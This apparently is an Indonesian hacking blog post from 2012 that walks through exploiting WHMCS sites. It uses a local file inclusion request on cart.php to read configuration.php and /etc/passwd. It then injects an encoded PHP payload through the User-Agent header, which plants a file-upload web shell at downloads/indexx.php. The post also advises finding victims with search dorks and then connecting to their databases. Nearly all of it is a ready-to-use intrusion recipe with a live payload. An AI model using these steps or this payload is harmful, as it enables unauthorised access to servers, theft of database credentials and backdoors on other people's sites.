Sabtu, 30 Juni 2012

WHMCS Exploit with LFI


Ada yang tau apa itu LFI ??
kalo yg belum saya akan menjelaskan sedikit apa itu LFI .
LFI a.k.a Local File Inclusion adalah sebuah bug dimana kita bisa mengexploitnya hanya dengan melalui URL, dan memanfaatkan segala cara untuk bisa mengakses Web tersebut.
Oke langsung saja ke POCnya :

1. Biasalah cari target dengan dork, dorknya sama kaya yang submitticket hanya rubah ja nanti dengan exploitnya.

2. Misalnya saya punya target yang sudah Vuln :


Di atas kita hanya memanfaatkan memalui cart.php atau bisa juga dengan yg lain nya , yg memiliki kerentanan.

3. Kemudian masukkan exploit LFI :

cart.php?a=syndrom&templatefile=../../../configuration.php

Sehingga misalnya kita contohkan seperti ini, :


4. Liat Source Web tersebut dengan menekan Ctrl+u , scroll kebawah dan lihat disana ada configuration webnya :D. asikk
Bagaimana cara mengkonekan nya :/

5.Ada beberapa cara untuk mengkonekan Configuration tersebut :
- Menggunakan ftp
- Menggunakan navicat for mysql
- Filezilla
- Menggunakan armitage ( bila anda menggunakan backtrack / blackbuntu ).

Anda tidak bisa mengkonekan sembarangan dengan port default, tentunya kita harus mengetahui port yang terbuka terlebih dahulu, untuk bisa mengakses semua Filenya, ada beberapa cara juga untuk mengecek portnya, diantaranya bisa menggunakan nmap bisa juga memakai port scanner yg ada di shell :D.

Ada Cara kedua selain mengkonekan dengan cara tersebut.
Caranya dengan menggunakan tamper data.

1. Install Dulu addons tamper data yg ada di mozilla
2. Setelah di install , kita cek /etc/passwdnya :


Kalo muncul , otomatis /proc/self/environ nya pun muncul, kita lihat muncul tidak :


3. Kemudian buka tamper lalu refresh , Klik tamper.. jangan Submit ataupun Cancel pastinya ;)
Disitu ada kolom User Agent, hapus tulisan yang Mozilla blablabla lalu ganti dengan :

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigiZG93bmxvYWRzL2luZGV4eC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTs=')) ;{/php})

Lalu ok, setelah proses tamper selsai, lalu kita cek apakah muncul tempat upload ??


/downloads/indexx.php << adalah path yang ada di exploit tersebut. ;)

Tidak ada komentar:

Posting Komentar